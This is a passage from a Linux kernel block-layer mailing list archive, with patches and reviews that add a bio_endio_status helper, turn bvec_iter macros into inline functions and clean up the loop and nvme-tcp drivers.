  Cc: Jens Axboe, linux-block, linux-kernel, io-uring, linux-mm,
	Leon Romanovsky
In-Reply-To: <ahaNpbG15d6StT9d@infradead.org>

On Tue, May 26, 2026 at 11:22:29PM -0700, Christoph Hellwig wrote:
> On Tue, May 26, 2026 at 06:47:30PM +0100, Matthew Wilcox wrote:
> > How about:
> > 
> > /**
> >  * bvec_folio - Return the first folio referenced by this bvec
> >  * @bv: bvec to access
> >  *
> >  * bvecs can contain non-folio memory, so this should only be called by
> >  * the creator of the bvec; drivers have no business looking at the owner
> >  * of the memory.  It may not even be the right interface for the caller
> >  * to use as bvecs can span multiple folios.  You may be better off using
> >  * something like bio_for_each_folio_all() which iterates over all folios.
> >  */
> 
> Sounds good, although I'd captialize the first word in the sentence.
> (Not that anyone should follow my spelling advice in general)

I don't know how to capitalise bvec.  Is it Bvec?  BVec?

Fortunately my wife is an expert, and many years ago taught me that if
you have a difficult grammar problem, don't fix it, avoid it.

 * A bvec can contain non-folio memory, so this should only be called by

^ permalink raw reply

* Re: [PATCH] block: add a bio_endio_status helper
From: Christoph Hellwig @ 2026-05-27 15:39 UTC (permalink / raw)
  To: Haris Iqbal; +Cc: Christoph Hellwig, axboe, linux-block
In-Reply-To: <c09acca3-d674-4671-8e8a-28c80e948266@linux.dev>

On Wed, May 27, 2026 at 05:33:18PM +0200, Haris Iqbal wrote:
> Do you plan to convert similar call patterns in other drivers like drbd, 
> zram, dm, etc, too?

Yes, as-needed.  But I'm happy to leave others to do that as well.

^ permalink raw reply

* Re: [PATCH] block: add a bio_endio_status helper
From: Haris Iqbal @ 2026-05-27 15:33 UTC (permalink / raw)
  To: Christoph Hellwig, axboe; +Cc: linux-block
In-Reply-To: <20260527151247.2352145-1-hch@lst.de>



On 5/27/26 17:12, Christoph Hellwig wrote:
> Add a helper that sets bi_status and call bio_endio() as that is a very
> common pattern and convert the core block code over to it.
> 
> Signed-off-by: Christoph Hellwig <hch@lst.de>

Looks good:

Reviewed-by: Md Haris Iqbal <haris.iqbal@linux.dev>

Do you plan to convert similar call patterns in other drivers like drbd, 
zram, dm, etc, too?

> ---
>   block/blk-core.c            | 11 ++++-------
>   block/blk-crypto-fallback.c |  9 +++------
>   block/blk-crypto.c          |  3 +--
>   block/blk-merge.c           |  6 ++----
>   block/blk-mq.c              |  6 ++----
>   block/fops.c                |  3 +--
>   include/linux/bio.h         | 19 +++++++++++++++----
>   7 files changed, 28 insertions(+), 29 deletions(-)
> 
> diff --git a/block/blk-core.c b/block/blk-core.c
> index 22af5dec112b..b0f0a304ea0b 100644
> --- a/block/blk-core.c
> +++ b/block/blk-core.c
> @@ -636,12 +636,10 @@ static void __submit_bio(struct bio *bio)
>   		struct gendisk *disk = bio->bi_bdev->bd_disk;
>   	
>   		if ((bio->bi_opf & REQ_POLLED) &&
> -		    !(disk->queue->limits.features & BLK_FEAT_POLL)) {
> -			bio->bi_status = BLK_STS_NOTSUPP;
> -			bio_endio(bio);
> -		} else {
> +		    !(disk->queue->limits.features & BLK_FEAT_POLL))
> +			bio_endio_status(bio, BLK_STS_NOTSUPP);
> +		else
>   			disk->fops->submit_bio(bio);
> -		}
>   		blk_queue_exit(disk->queue);
>   	}
>   
> @@ -886,8 +884,7 @@ void submit_bio_noacct(struct bio *bio)
>   not_supported:
>   	status = BLK_STS_NOTSUPP;
>   end_io:
> -	bio->bi_status = status;
> -	bio_endio(bio);
> +	bio_endio_status(bio, status);
>   }
>   EXPORT_SYMBOL(submit_bio_noacct);
>   
> diff --git a/block/blk-crypto-fallback.c b/block/blk-crypto-fallback.c
> index 61f595410832..8b04d9205b8d 100644
> --- a/block/blk-crypto-fallback.c
> +++ b/block/blk-crypto-fallback.c
> @@ -361,8 +361,7 @@ static void blk_crypto_fallback_encrypt_bio(struct bio *src_bio)
>   	status = blk_crypto_get_keyslot(blk_crypto_fallback_profile,
>   					bc->bc_key, &slot);
>   	if (status != BLK_STS_OK) {
> -		src_bio->bi_status = status;
> -		bio_endio(src_bio);
> +		bio_endio_status(src_bio, status);
>   		return;
>   	}
>   	__blk_crypto_fallback_encrypt_bio(src_bio,
> @@ -437,8 +436,7 @@ static void blk_crypto_fallback_decrypt_bio(struct work_struct *work)
>   	}
>   	mempool_free(f_ctx, bio_fallback_crypt_ctx_pool);
>   
> -	bio->bi_status = status;
> -	bio_endio(bio);
> +	bio_endio_status(bio, status);
>   }
>   
>   /**
> @@ -499,8 +497,7 @@ bool blk_crypto_fallback_bio_prep(struct bio *bio)
>   
>   	if (!__blk_crypto_cfg_supported(blk_crypto_fallback_profile,
>   					&bc->bc_key->crypto_cfg)) {
> -		bio->bi_status = BLK_STS_NOTSUPP;
> -		bio_endio(bio);
> +		bio_endio_status(bio, BLK_STS_NOTSUPP);
>   		return false;
>   	}
>   
> diff --git a/block/blk-crypto.c b/block/blk-crypto.c
> index 856d3c5b1fa0..165c9d2cce07 100644
> --- a/block/blk-crypto.c
> +++ b/block/blk-crypto.c
> @@ -267,8 +267,7 @@ bool __blk_crypto_submit_bio(struct bio *bio)
>   		if (!IS_ENABLED(CONFIG_BLK_INLINE_ENCRYPTION_FALLBACK)) {
>   			pr_warn_once("%pg: crypto API fallback disabled; failing request.\n",
>   				bdev);
> -			bio->bi_status = BLK_STS_NOTSUPP;
> -			bio_endio(bio);
> +			bio_endio_status(bio, BLK_STS_NOTSUPP);
>   			return false;
>   		}
>   		return blk_crypto_fallback_bio_prep(bio);
> diff --git a/block/blk-merge.c b/block/blk-merge.c
> index fcf09325b22e..7cc82a7a6f4e 100644
> --- a/block/blk-merge.c
> +++ b/block/blk-merge.c
> @@ -122,8 +122,7 @@ struct bio *bio_submit_split_bioset(struct bio *bio, unsigned int split_sectors,
>   	struct bio *split = bio_split(bio, split_sectors, GFP_NOIO, bs);
>   
>   	if (IS_ERR(split)) {
> -		bio->bi_status = errno_to_blk_status(PTR_ERR(split));
> -		bio_endio(bio);
> +		bio_endio_status(bio, errno_to_blk_status(PTR_ERR(split)));
>   		return NULL;
>   	}
>   
> @@ -143,8 +142,7 @@ EXPORT_SYMBOL_GPL(bio_submit_split_bioset);
>   static struct bio *bio_submit_split(struct bio *bio, int split_sectors)
>   {
>   	if (unlikely(split_sectors < 0)) {
> -		bio->bi_status = errno_to_blk_status(split_sectors);
> -		bio_endio(bio);
> +		bio_endio_status(bio, errno_to_blk_status(split_sectors));
>   		return NULL;
>   	}
>   
> diff --git a/block/blk-mq.c b/block/blk-mq.c
> index 4c5c16cce4f8..ade9d3a89743 100644
> --- a/block/blk-mq.c
> +++ b/block/blk-mq.c
> @@ -3187,8 +3187,7 @@ void blk_mq_submit_bio(struct bio *bio)
>   	}
>   
>   	if ((bio->bi_opf & REQ_POLLED) && !blk_mq_can_poll(q)) {
> -		bio->bi_status = BLK_STS_NOTSUPP;
> -		bio_endio(bio);
> +		bio_endio_status(bio, BLK_STS_NOTSUPP);
>   		goto queue_exit;
>   	}
>   
> @@ -3229,8 +3228,7 @@ void blk_mq_submit_bio(struct bio *bio)
>   
>   	ret = blk_crypto_rq_get_keyslot(rq);
>   	if (ret != BLK_STS_OK) {
> -		bio->bi_status = ret;
> -		bio_endio(bio);
> +		bio_endio_status(bio, ret);
>   		blk_mq_free_request(rq);
>   		return;
>   	}
> diff --git a/block/fops.c b/block/fops.c
> index ffe7b2042f4e..15783a6180de 100644
> --- a/block/fops.c
> +++ b/block/fops.c
> @@ -218,8 +218,7 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
>   
>   		ret = blkdev_iov_iter_get_pages(bio, iter, bdev);
>   		if (unlikely(ret)) {
> -			bio->bi_status = BLK_STS_IOERR;
> -			bio_endio(bio);
> +			bio_endio_status(bio, BLK_STS_IOERR);
>   			break;
>   		}
>   		if (iocb->ki_flags & IOCB_NOWAIT) {
> diff --git a/include/linux/bio.h b/include/linux/bio.h
> index 7597ae4dc52b..d778e65fdacd 100644
> --- a/include/linux/bio.h
> +++ b/include/linux/bio.h
> @@ -371,16 +371,27 @@ void submit_bio(struct bio *bio);
>   
>   extern void bio_endio(struct bio *);
>   
> -static inline void bio_io_error(struct bio *bio)
> +/**
> + * bio_endio_status - end I/O on a bio with a specific status
> + * @bio:	bio
> + * @status:	status to set
> + *
> + * Set @bio->bi_status to @status and call bio_endio().
> + **/
> +static inline void bio_endio_status(struct bio *bio, blk_status_t status)
>   {
> -	bio->bi_status = BLK_STS_IOERR;
> +	bio->bi_status = status;
>   	bio_endio(bio);
>   }
>   
> +static inline void bio_io_error(struct bio *bio)
> +{
> +	bio_endio_status(bio, BLK_STS_IOERR);
> +}
> +
>   static inline void bio_wouldblock_error(struct bio *bio)
>   {
> -	bio->bi_status = BLK_STS_AGAIN;
> -	bio_endio(bio);
> +	bio_endio_status(bio, BLK_STS_AGAIN);
>   }
>   
>   /*


^ permalink raw reply

* Re: [PATCH] block: mark biovec_init_pool static
From: Bart Van Assche @ 2026-05-27 15:33 UTC (permalink / raw)
  To: Christoph Hellwig, axboe; +Cc: linux-block
In-Reply-To: <20260527150646.2349405-1-hch@lst.de>

On 5/27/26 8:06 AM, Christoph Hellwig wrote:
> Signed-off-by: Christoph Hellwig <hch@lst.de>
> ---
>   block/bio.c         | 2 +-
>   include/linux/bio.h | 1 -
>   2 files changed, 1 insertion(+), 2 deletions(-)
> 
> diff --git a/block/bio.c b/block/bio.c
> index 2d880d1255fe..e9944dab0132 100644
> --- a/block/bio.c
> +++ b/block/bio.c
> @@ -1873,7 +1873,7 @@ EXPORT_SYMBOL_GPL(bio_trim);
>    * create memory pools for biovec's in a bio_set.
>    * use the global biovec slabs created for general use.
>    */
> -int biovec_init_pool(mempool_t *pool, int pool_entries)
> +static int biovec_init_pool(mempool_t *pool, int pool_entries)
>   {
>   	struct biovec_slab *bp = bvec_slabs + ARRAY_SIZE(bvec_slabs) - 1;
>   
> diff --git a/include/linux/bio.h b/include/linux/bio.h
> index 7597ae4dc52b..e60d2f5bd3dc 100644
> --- a/include/linux/bio.h
> +++ b/include/linux/bio.h
> @@ -347,7 +347,6 @@ enum {
>   };
>   extern int bioset_init(struct bio_set *, unsigned int, unsigned int, int flags);
>   extern void bioset_exit(struct bio_set *);
> -extern int biovec_init_pool(mempool_t *pool, int pool_entries);
>   
>   struct bio *bio_alloc_bioset(struct block_device *bdev, unsigned short nr_vecs,
>   			     blk_opf_t opf, gfp_t gfp, struct bio_set *bs);

Reviewed-by: Bart Van Assche <bvanassche@acm.org>

^ permalink raw reply

* Re: [PATCH] block: add a bio_endio_status helper
From: Keith Busch @ 2026-05-27 15:27 UTC (permalink / raw)
  To: Christoph Hellwig; +Cc: axboe, linux-block
In-Reply-To: <20260527151247.2352145-1-hch@lst.de>

On Wed, May 27, 2026 at 05:12:47PM +0200, Christoph Hellwig wrote:
> Add a helper that sets bi_status and calls bio_endio(), as that is a very
> common pattern, and convert the core block code over to it.

Thanks, this looks good.

Reviewed-by: Keith Busch <kbusch@kernel.org>

^ permalink raw reply

* Re: [PATCH 3/3] bvec: make the bvec_iter helpers inline functions
From: Keith Busch @ 2026-05-27 15:21 UTC (permalink / raw)
  To: Christoph Hellwig
  Cc: Jens Axboe, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-4-hch@lst.de>

On Wed, May 27, 2026 at 05:10:22PM +0200, Christoph Hellwig wrote:
> The macros are impossible to follow due to the lack of visual type
> information and all the braces.  Replace them with inline helpers to
> improve on that.  Because the calling conventions are a bit problematic
> with a lot of passing structures by value, all the helpers are marked
> as __always_inline so that they are force inlined.

Looks good.

Reviewed-by: Keith Busch <kbusch@kernel.org>

^ permalink raw reply

* Re: [PATCH 2/3] nvme-tcp: cleanup nvme_tcp_init_iter
From: Keith Busch @ 2026-05-27 15:20 UTC (permalink / raw)
  To: Christoph Hellwig
  Cc: Jens Axboe, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-3-hch@lst.de>

On Wed, May 27, 2026 at 05:10:21PM +0200, Christoph Hellwig wrote:
> Split the two init cases based on code in the zloop driver.  This
> simplifies the code and makes it easier to follow.

Looks good.

Reviewed-by: Keith Busch <kbusch@kernel.org>

^ permalink raw reply

* Re: [PATCH 1/3] loop: cleanup lo_rw_aio
From: Keith Busch @ 2026-05-27 15:20 UTC (permalink / raw)
  To: Christoph Hellwig
  Cc: Jens Axboe, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-2-hch@lst.de>

On Wed, May 27, 2026 at 05:10:20PM +0200, Christoph Hellwig wrote:
> Port over the changes from the zloop driver to remove the need for
> the local bio, bvec and offset variables, cleaning up the code in
> the process.

Looks good.

Reviewed-by: Keith Busch <kbusch@kernel.org>

^ permalink raw reply

* [PATCH] block: add a bio_endio_status helper
From: Christoph Hellwig @ 2026-05-27 15:12 UTC (permalink / raw)
  To: axboe; +Cc: linux-block

Add a helper that sets bi_status and calls bio_endio(), as that is a very
common pattern, and convert the core block code over to it.

Signed-off-by: Christoph Hellwig <hch@lst.de>
---
 block/blk-core.c            | 11 ++++-------
 block/blk-crypto-fallback.c |  9 +++------
 block/blk-crypto.c          |  3 +--
 block/blk-merge.c           |  6 ++----
 block/blk-mq.c              |  6 ++----
 block/fops.c                |  3 +--
 include/linux/bio.h         | 19 +++++++++++++++----
 7 files changed, 28 insertions(+), 29 deletions(-)

diff --git a/block/blk-core.c b/block/blk-core.c
index 22af5dec112b..b0f0a304ea0b 100644
--- a/block/blk-core.c
+++ b/block/blk-core.c
@@ -636,12 +636,10 @@ static void __submit_bio(struct bio *bio)
 		struct gendisk *disk = bio->bi_bdev->bd_disk;
 	
 		if ((bio->bi_opf & REQ_POLLED) &&
-		    !(disk->queue->limits.features & BLK_FEAT_POLL)) {
-			bio->bi_status = BLK_STS_NOTSUPP;
-			bio_endio(bio);
-		} else {
+		    !(disk->queue->limits.features & BLK_FEAT_POLL))
+			bio_endio_status(bio, BLK_STS_NOTSUPP);
+		else
 			disk->fops->submit_bio(bio);
-		}
 		blk_queue_exit(disk->queue);
 	}
 
@@ -886,8 +884,7 @@ void submit_bio_noacct(struct bio *bio)
 not_supported:
 	status = BLK_STS_NOTSUPP;
 end_io:
-	bio->bi_status = status;
-	bio_endio(bio);
+	bio_endio_status(bio, status);
 }
 EXPORT_SYMBOL(submit_bio_noacct);
 
diff --git a/block/blk-crypto-fallback.c b/block/blk-crypto-fallback.c
index 61f595410832..8b04d9205b8d 100644
--- a/block/blk-crypto-fallback.c
+++ b/block/blk-crypto-fallback.c
@@ -361,8 +361,7 @@ static void blk_crypto_fallback_encrypt_bio(struct bio *src_bio)
 	status = blk_crypto_get_keyslot(blk_crypto_fallback_profile,
 					bc->bc_key, &slot);
 	if (status != BLK_STS_OK) {
-		src_bio->bi_status = status;
-		bio_endio(src_bio);
+		bio_endio_status(src_bio, status);
 		return;
 	}
 	__blk_crypto_fallback_encrypt_bio(src_bio,
@@ -437,8 +436,7 @@ static void blk_crypto_fallback_decrypt_bio(struct work_struct *work)
 	}
 	mempool_free(f_ctx, bio_fallback_crypt_ctx_pool);
 
-	bio->bi_status = status;
-	bio_endio(bio);
+	bio_endio_status(bio, status);
 }
 
 /**
@@ -499,8 +497,7 @@ bool blk_crypto_fallback_bio_prep(struct bio *bio)
 
 	if (!__blk_crypto_cfg_supported(blk_crypto_fallback_profile,
 					&bc->bc_key->crypto_cfg)) {
-		bio->bi_status = BLK_STS_NOTSUPP;
-		bio_endio(bio);
+		bio_endio_status(bio, BLK_STS_NOTSUPP);
 		return false;
 	}
 
diff --git a/block/blk-crypto.c b/block/blk-crypto.c
index 856d3c5b1fa0..165c9d2cce07 100644
--- a/block/blk-crypto.c
+++ b/block/blk-crypto.c
@@ -267,8 +267,7 @@ bool __blk_crypto_submit_bio(struct bio *bio)
 		if (!IS_ENABLED(CONFIG_BLK_INLINE_ENCRYPTION_FALLBACK)) {
 			pr_warn_once("%pg: crypto API fallback disabled; failing request.\n",
 				bdev);
-			bio->bi_status = BLK_STS_NOTSUPP;
-			bio_endio(bio);
+			bio_endio_status(bio, BLK_STS_NOTSUPP);
 			return false;
 		}
 		return blk_crypto_fallback_bio_prep(bio);
diff --git a/block/blk-merge.c b/block/blk-merge.c
index fcf09325b22e..7cc82a7a6f4e 100644
--- a/block/blk-merge.c
+++ b/block/blk-merge.c
@@ -122,8 +122,7 @@ struct bio *bio_submit_split_bioset(struct bio *bio, unsigned int split_sectors,
 	struct bio *split = bio_split(bio, split_sectors, GFP_NOIO, bs);
 
 	if (IS_ERR(split)) {
-		bio->bi_status = errno_to_blk_status(PTR_ERR(split));
-		bio_endio(bio);
+		bio_endio_status(bio, errno_to_blk_status(PTR_ERR(split)));
 		return NULL;
 	}
 
@@ -143,8 +142,7 @@ EXPORT_SYMBOL_GPL(bio_submit_split_bioset);
 static struct bio *bio_submit_split(struct bio *bio, int split_sectors)
 {
 	if (unlikely(split_sectors < 0)) {
-		bio->bi_status = errno_to_blk_status(split_sectors);
-		bio_endio(bio);
+		bio_endio_status(bio, errno_to_blk_status(split_sectors));
 		return NULL;
 	}
 
diff --git a/block/blk-mq.c b/block/blk-mq.c
index 4c5c16cce4f8..ade9d3a89743 100644
--- a/block/blk-mq.c
+++ b/block/blk-mq.c
@@ -3187,8 +3187,7 @@ void blk_mq_submit_bio(struct bio *bio)
 	}
 
 	if ((bio->bi_opf & REQ_POLLED) && !blk_mq_can_poll(q)) {
-		bio->bi_status = BLK_STS_NOTSUPP;
-		bio_endio(bio);
+		bio_endio_status(bio, BLK_STS_NOTSUPP);
 		goto queue_exit;
 	}
 
@@ -3229,8 +3228,7 @@ void blk_mq_submit_bio(struct bio *bio)
 
 	ret = blk_crypto_rq_get_keyslot(rq);
 	if (ret != BLK_STS_OK) {
-		bio->bi_status = ret;
-		bio_endio(bio);
+		bio_endio_status(bio, ret);
 		blk_mq_free_request(rq);
 		return;
 	}
diff --git a/block/fops.c b/block/fops.c
index ffe7b2042f4e..15783a6180de 100644
--- a/block/fops.c
+++ b/block/fops.c
@@ -218,8 +218,7 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
 
 		ret = blkdev_iov_iter_get_pages(bio, iter, bdev);
 		if (unlikely(ret)) {
-			bio->bi_status = BLK_STS_IOERR;
-			bio_endio(bio);
+			bio_endio_status(bio, BLK_STS_IOERR);
 			break;
 		}
 		if (iocb->ki_flags & IOCB_NOWAIT) {
diff --git a/include/linux/bio.h b/include/linux/bio.h
index 7597ae4dc52b..d778e65fdacd 100644
--- a/include/linux/bio.h
+++ b/include/linux/bio.h
@@ -371,16 +371,27 @@ void submit_bio(struct bio *bio);
 
 extern void bio_endio(struct bio *);
 
-static inline void bio_io_error(struct bio *bio)
+/**
+ * bio_endio_status - end I/O on a bio with a specific status
+ * @bio:	bio
+ * @status:	status to set
+ *
+ * Set @bio->bi_status to @status and call bio_endio().
+ **/
+static inline void bio_endio_status(struct bio *bio, blk_status_t status)
 {
-	bio->bi_status = BLK_STS_IOERR;
+	bio->bi_status = status;
 	bio_endio(bio);
 }
 
+static inline void bio_io_error(struct bio *bio)
+{
+	bio_endio_status(bio, BLK_STS_IOERR);
+}
+
 static inline void bio_wouldblock_error(struct bio *bio)
 {
-	bio->bi_status = BLK_STS_AGAIN;
-	bio_endio(bio);
+	bio_endio_status(bio, BLK_STS_AGAIN);
 }
 
 /*
-- 
2.53.0


^ permalink raw reply related

* [PATCH 3/3] bvec: make the bvec_iter helpers inline functions
From: Christoph Hellwig @ 2026-05-27 15:10 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Keith Busch, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-1-hch@lst.de>

The macros are impossible to follow due to the lack of visual type
information and all the braces.  Replace them with inline helpers to
improve on that.  Because the calling conventions are a bit problematic
with a lot of passing structures by value, all the helpers are marked
as __always_inline so that they are force inlined.

Signed-off-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Bart Van Assche <bvanassche@acm.org>
Reviewed-by: Caleb Sander Mateos <csander@purestorage.com>
---
 include/linux/bvec.h | 101 +++++++++++++++++++++++++++----------------
 1 file changed, 64 insertions(+), 37 deletions(-)

diff --git a/include/linux/bvec.h b/include/linux/bvec.h
index d36dd476feda..f4c7ec282ac9 100644
--- a/include/linux/bvec.h
+++ b/include/linux/bvec.h
@@ -104,51 +104,78 @@ struct bvec_iter_all {
 	unsigned	done;
 };
 
-/*
- * various member access, note that bio_data should of course not be used
- * on highmem page vectors
- */
-#define __bvec_iter_bvec(bvec, iter)	(&(bvec)[(iter).bi_idx])
+static __always_inline const struct bio_vec *
+__bvec_iter_bvec(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return bvecs + iter.bi_idx;
+}
 
 /* multi-page (mp_bvec) helpers */
-#define mp_bvec_iter_page(bvec, iter)				\
-	(__bvec_iter_bvec((bvec), (iter))->bv_page)
+static __always_inline struct page *
+mp_bvec_iter_page(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return __bvec_iter_bvec(bvecs, iter)->bv_page;
+}
 
-#define mp_bvec_iter_len(bvec, iter)				\
-	min((iter).bi_size,					\
-	    __bvec_iter_bvec((bvec), (iter))->bv_len - (iter).bi_bvec_done)
+static __always_inline unsigned int
+mp_bvec_iter_len(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return min(__bvec_iter_bvec(bvecs, iter)->bv_len - iter.bi_bvec_done,
+			iter.bi_size);
+}
 
-#define mp_bvec_iter_offset(bvec, iter)				\
-	(__bvec_iter_bvec((bvec), (iter))->bv_offset + (iter).bi_bvec_done)
+static __always_inline unsigned int
+mp_bvec_iter_offset(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return __bvec_iter_bvec(bvecs, iter)->bv_offset + iter.bi_bvec_done;
+}
 
-#define mp_bvec_iter_page_idx(bvec, iter)			\
-	(mp_bvec_iter_offset((bvec), (iter)) / PAGE_SIZE)
+static __always_inline unsigned int
+mp_bvec_iter_page_idx(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return mp_bvec_iter_offset(bvecs, iter) / PAGE_SIZE;
+}
 
-#define mp_bvec_iter_bvec(bvec, iter)				\
-((struct bio_vec) {						\
-	.bv_page	= mp_bvec_iter_page((bvec), (iter)),	\
-	.bv_len		= mp_bvec_iter_len((bvec), (iter)),	\
-	.bv_offset	= mp_bvec_iter_offset((bvec), (iter)),	\
-})
+static __always_inline struct bio_vec
+mp_bvec_iter_bvec(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return (struct bio_vec) {
+		.bv_page	= mp_bvec_iter_page(bvecs, iter),
+		.bv_len		= mp_bvec_iter_len(bvecs, iter),
+		.bv_offset	= mp_bvec_iter_offset(bvecs, iter),
+	};
+}
 
 /* For building single-page bvec in flight */
- #define bvec_iter_offset(bvec, iter)				\
-	(mp_bvec_iter_offset((bvec), (iter)) % PAGE_SIZE)
-
-#define bvec_iter_len(bvec, iter)				\
-	min_t(unsigned, mp_bvec_iter_len((bvec), (iter)),		\
-	      PAGE_SIZE - bvec_iter_offset((bvec), (iter)))
-
-#define bvec_iter_page(bvec, iter)				\
-	(mp_bvec_iter_page((bvec), (iter)) +			\
-	 mp_bvec_iter_page_idx((bvec), (iter)))
-
-#define bvec_iter_bvec(bvec, iter)				\
-((struct bio_vec) {						\
-	.bv_page	= bvec_iter_page((bvec), (iter)),	\
-	.bv_len		= bvec_iter_len((bvec), (iter)),	\
-	.bv_offset	= bvec_iter_offset((bvec), (iter)),	\
-})
+static __always_inline unsigned int
+bvec_iter_offset(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return mp_bvec_iter_offset(bvecs, iter) % PAGE_SIZE;
+}
+
+static __always_inline unsigned int
+bvec_iter_len(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return min(mp_bvec_iter_len(bvecs, iter),
+			PAGE_SIZE - bvec_iter_offset(bvecs, iter));
+}
+
+static __always_inline struct page *
+bvec_iter_page(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return mp_bvec_iter_page(bvecs, iter) +
+		mp_bvec_iter_page_idx(bvecs, iter);
+}
+
+static __always_inline struct bio_vec
+bvec_iter_bvec(const struct bio_vec *bvecs, const struct bvec_iter iter)
+{
+	return (struct bio_vec) {
+		.bv_page	= bvec_iter_page(bvecs, iter),
+		.bv_len		= bvec_iter_len(bvecs, iter),
+		.bv_offset	= bvec_iter_offset(bvecs, iter),
+	};
+}
 
 static inline bool bvec_iter_advance(const struct bio_vec *bv,
 		struct bvec_iter *iter, unsigned bytes)
-- 
2.53.0


^ permalink raw reply related

* [PATCH 2/3] nvme-tcp: cleanup nvme_tcp_init_iter
From: Christoph Hellwig @ 2026-05-27 15:10 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Keith Busch, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-1-hch@lst.de>

Split the two init cases based on code in the zloop driver.  This
simplifies the code and makes it easier to follow.

Signed-off-by: Christoph Hellwig <hch@lst.de>
---
 drivers/nvme/host/tcp.c | 27 ++++++++++-----------------
 1 file changed, 10 insertions(+), 17 deletions(-)

diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
index 36b3ec50a9fd..9313ab211c67 100644
--- a/drivers/nvme/host/tcp.c
+++ b/drivers/nvme/host/tcp.c
@@ -340,32 +340,25 @@ static void nvme_tcp_init_iter(struct nvme_tcp_request *req,
 		unsigned int dir)
 {
 	struct request *rq = blk_mq_rq_from_pdu(req);
-	struct bio_vec *vec;
-	unsigned int size;
-	int nr_bvec;
-	size_t offset;
 
 	if (rq->rq_flags & RQF_SPECIAL_PAYLOAD) {
-		vec = &rq->special_vec;
-		nr_bvec = 1;
-		size = blk_rq_payload_bytes(rq);
-		offset = 0;
+		iov_iter_bvec(&req->iter, dir, &rq->special_vec, 1,
+				blk_rq_payload_bytes(rq));
+		req->iter.iov_offset = 0;
 	} else {
 		struct bio *bio = req->curr_bio;
 		struct bvec_iter bi;
 		struct bio_vec bv;
+		int nr_bvec = 0;
 
-		vec = __bvec_iter_bvec(bio->bi_io_vec, bio->bi_iter);
-		nr_bvec = 0;
-		bio_for_each_bvec(bv, bio, bi) {
+		bio_for_each_bvec(bv, bio, bi)
 			nr_bvec++;
-		}
-		size = bio->bi_iter.bi_size;
-		offset = bio->bi_iter.bi_bvec_done;
-	}
 
-	iov_iter_bvec(&req->iter, dir, vec, nr_bvec, size);
-	req->iter.iov_offset = offset;
+		iov_iter_bvec(&req->iter, dir,
+			__bvec_iter_bvec(bio->bi_io_vec, bio->bi_iter), nr_bvec,
+			bio->bi_iter.bi_size);
+		req->iter.iov_offset = bio->bi_iter.bi_bvec_done;
+	}
 }
 
 static inline void nvme_tcp_advance_req(struct nvme_tcp_request *req,
-- 
2.53.0


^ permalink raw reply related

* [PATCH 1/3] loop: cleanup lo_rw_aio
From: Christoph Hellwig @ 2026-05-27 15:10 UTC (permalink / raw)
  To: Jens Axboe
  Cc: Keith Busch, Sagi Grimberg, Ming Lei, Bart Van Assche,
	Caleb Sander Mateos, linux-block, linux-nvme
In-Reply-To: <20260527151043.2349900-1-hch@lst.de>

Port over the changes from the zloop driver to remove the need for
the local bio, bvec and offset variables, cleaning up the code in
the process.

Signed-off-by: Christoph Hellwig <hch@lst.de>
---
 drivers/block/loop.c | 24 ++++++++++--------------
 1 file changed, 10 insertions(+), 14 deletions(-)

diff --git a/drivers/block/loop.c b/drivers/block/loop.c
index 0000913f7efc..310de0463beb 100644
--- a/drivers/block/loop.c
+++ b/drivers/block/loop.c
@@ -342,23 +342,19 @@ static int lo_rw_aio(struct loop_device *lo, struct loop_cmd *cmd,
 {
 	struct iov_iter iter;
 	struct req_iterator rq_iter;
-	struct bio_vec *bvec;
 	struct request *rq = blk_mq_rq_from_pdu(cmd);
-	struct bio *bio = rq->bio;
 	struct file *file = lo->lo_backing_file;
-	struct bio_vec tmp;
-	unsigned int offset;
 	unsigned int nr_bvec;
 	int ret;
 
 	nr_bvec = blk_rq_nr_bvec(rq);
 
 	if (rq->bio != rq->biotail) {
+		struct bio_vec tmp, *bvec;
 
-		bvec = kmalloc_objs(struct bio_vec, nr_bvec, GFP_NOIO);
-		if (!bvec)
+		cmd->bvec = kmalloc_objs(*cmd->bvec, nr_bvec, GFP_NOIO);
+		if (!cmd->bvec)
 			return -EIO;
-		cmd->bvec = bvec;
 
 		/*
 		 * The bios of the request may be started from the middle of
@@ -366,26 +362,26 @@ static int lo_rw_aio(struct loop_device *lo, struct loop_cmd *cmd,
 		 * copy bio->bi_iov_vec to new bvec. The rq_for_each_bvec
 		 * API will take care of all details for us.
 		 */
+		bvec = cmd->bvec;
 		rq_for_each_bvec(tmp, rq, rq_iter) {
 			*bvec = tmp;
 			bvec++;
 		}
-		bvec = cmd->bvec;
-		offset = 0;
+		iov_iter_bvec(&iter, rw, cmd->bvec, nr_bvec, blk_rq_bytes(rq));
+		iter.iov_offset = 0;
 	} else {
 		/*
 		 * Same here, this bio may be started from the middle of the
 		 * 'bvec' because of bio splitting, so offset from the bvec
 		 * must be passed to iov iterator
 		 */
-		offset = bio->bi_iter.bi_bvec_done;
-		bvec = __bvec_iter_bvec(bio->bi_io_vec, bio->bi_iter);
+		iov_iter_bvec(&iter, rw,
+			__bvec_iter_bvec(rq->bio->bi_io_vec, rq->bio->bi_iter),
